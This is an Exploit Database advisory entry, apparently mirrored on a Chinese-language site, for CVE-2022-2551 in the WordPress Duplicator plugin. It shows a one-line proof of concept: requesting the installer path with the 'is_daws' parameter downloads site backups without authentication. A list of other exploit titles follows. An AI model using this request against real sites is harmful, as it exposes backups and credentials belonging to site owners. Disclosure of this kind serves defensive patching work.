WordPress Plugin Duplicator 1.4.6 – Unauthenticated Backup Download

Exploit Database
17 阅读

作者： SecuriTrust

日期： 2022-08-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50992/

# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2551
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551

#Product:
WordPress Plugin Duplicator < 1.4.7

#Vulnerability:
1-It allows an attacker to download the backup file.

#Proof-Of-Concept:
1-Backup download.
The backup file can be downloaded using the "is_daws" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

last Exploits
WordPress Plugin Duplicator 1.4.6 – Unauthenticated Backup Download的更多信息

VestaCP 0.9.8-26 – ‘LoginAs’ Insufficient Session Validation：
tinybrowser – ‘type’ Cross-Site Scripting：
Prizm Content Connect v10.5.1030.8315 – XXE：
DataLife Engine 8.3 – ‘/engine/ajax/pm.php?config[lang]’ Remote File Inclusion：
Merit Lilin IP Cameras – Multiple Vulnerabilities：
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – SQL Injection：
BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution：
Travel Tours Script 2.0 – SQL Injection：